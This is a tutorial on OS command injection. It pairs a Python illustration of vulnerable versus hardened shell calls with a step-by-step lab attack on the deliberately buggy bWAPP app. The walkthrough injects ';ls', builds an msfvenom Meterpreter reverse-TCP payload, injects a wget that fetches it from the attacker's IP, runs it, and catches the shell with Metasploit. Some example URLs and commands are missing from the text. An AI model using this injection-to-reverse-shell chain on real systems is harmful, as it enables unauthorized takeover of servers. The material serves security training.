OS command injection is an attack whose goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection is possible when an application passes unsafe user-supplied data (form fields, cookies, HTTP headers etc.) to a system shell.
The attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from code injection, in which the attacker adds their own code that is then executed by the application. In code injection the attacker extends the default functionality of the application without needing to execute system commands.
In the web context, the attacker supplies operating system commands through a web interface (a form field or URL parameter) and the web server executes them. Any web interface that passes such input to a shell without proper sanitization is exposed. With the ability to execute OS commands, the attacker can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
How to Test
When viewing a file in a web application, the file name is often shown in the URL. Perl's two-argument open treats a file name that ends in the pipe symbol "|" as a command to run, piping the command's output into the open statement. The attacker simply appends "|" to the end of the file name.
Example URL before alteration:
Example URL modified:
This will execute the command “/bin/ls”.
That covers the background on OS command injection. Now let's work through a practical example on Kali Linux. We will use bWAPP, a deliberately buggy, free and open-source web application used by pentesters for practice. I'll assume you already have bWAPP installed on your local machine.
Before opening bWAPP in the browser, start the Apache and MySQL services from a terminal:
service apache2 start
service mysql start
Now open bWAPP and select OS Command Injection from the bug selection drop-down menu. Type ;ls in the form field and click Lookup. The response includes a directory listing, which shows that the input is appended to a shell command without sanitization: the semicolon terminates the intended command and ls runs as a second command.
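To make clear why ;ls works, here is an added example (not code from bWAPP or from the original article) that reproduces the vulnerable pattern and its hardened form. The lookup handler is a constructed stand-in: bWAPP runs nslookup, and echo is substituted here so the example runs offline, but the dangerous step, splicing the submitted value into a command line that /bin/sh interprets, is the same. Function names, the host-name regex and the sample payloads are all assumptions made for this illustration.

```python
import re
import subprocess

# Constructed stand-in for the bWAPP "lookup" form. The real form calls nslookup;
# echo is used here so the example runs offline, but the string concatenation
# handed to /bin/sh is the same mistake.


def vulnerable_lookup(host):
    """Vulnerable: the user-supplied host is concatenated into a shell command.
    Because shell=True runs the string through /bin/sh, a ';' in the input ends
    the echo command and whatever follows runs as a second command."""
    cmd = "echo Looking up " + host          # e.g. "echo Looking up ;ls"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def argv_lookup(host):
    """Safer: the command is an argv list and no shell is involved, so ';',
    '|' and '&&' are ordinary characters passed to the program as data.
    It still accepts any string, so a real command could be hit with option
    injection (a host starting with '-'); pair it with validation."""
    proc = subprocess.run(["echo", "Looking", "up", host],
                          capture_output=True, text=True)
    return proc.stdout


# Allowlist for a DNS name (assumed policy for this example): labels of
# letters, digits and hyphens, separated by dots, not starting with a hyphen.
HOSTNAME_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*")


def safe_lookup(host):
    """Hardened: reject anything that is not a plausible host name, then run
    the command without a shell. Shell metacharacters never reach a shell."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError("invalid host name: %r" % host)
    return argv_lookup(host)


if __name__ == "__main__":
    # Constructed inputs in the style of the payloads used against bWAPP above;
    # the injected commands are echo so nothing harmful runs on your machine.
    for payload in ("example.com", ";echo INJECTED", "example.com | echo PIPED"):
        print("vulnerable:", repr(vulnerable_lookup(payload)))
        print("argv only :", repr(argv_lookup(payload)))
        try:
            print("hardened  :", repr(safe_lookup(payload)))
        except ValueError as e:
            print("hardened  : rejected (%s)" % e)
```

Running it shows the three behaviours side by side: the vulnerable version prints INJECTED on its own line because the shell executed a second command, the argv version prints the semicolon and everything after it literally, and the hardened version refuses the input before any process is started.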
Since the application is vulnerable to OS command injection, we can upload a shell to the box. First, find your IP address by typing ifconfig in the terminal. In my case it is 192.168.193.128.
To create the shell payload, go back to the terminal and use msfvenom (which replaced the older msfpayload and msfencode tools).
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.193.128 LPORT=1234 -f raw > /var/www/html/spirit.php
Meterpreter is an advanced, dynamically extensible payload. reverse_tcp makes the payload connect back to LHOST (the attacker's machine) on LPORT (the port we will listen on). -f raw sets the output format to raw PHP source rather than an executable. The output is redirected to /var/www/html/spirit.php, the Apache document root, so the target can fetch it over HTTP.
Start the Python web server:
Everything is in place, so it's time to get the shell onto the vulnerable web server. Injecting a wget command makes the target download the file from our machine. Keep in mind that the shell sits in our web root, so the URL points at our own IP address.
; wget http://192.168.193.128/spirit.php
Click Lookup and the target downloads the shell. To verify, inject ;ls again and use Ctrl+F on the page output to search for spirit.php.
The shell is now on the server, so we will catch its connection with the multi/handler module of Metasploit (the exploitation framework). Type the following command in the terminal to start the Metasploit interface:
When msf starts, use the following commands:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.193.128
set LPORT 1234
exploit
Once the handler is listening, go back to the bWAPP form and inject the following so that the target executes the uploaded script:
;php -f spirit.php
Wait a second for the uploaded script to connect back to the handler. That's it: a Meterpreter session opens and you can run commands on the target.
To list the available Meterpreter commands, type help at the meterpreter prompt.
This is it, enjoy exploring vulnerabilities.
To learn how to sanitize form input against OS command injection, click here.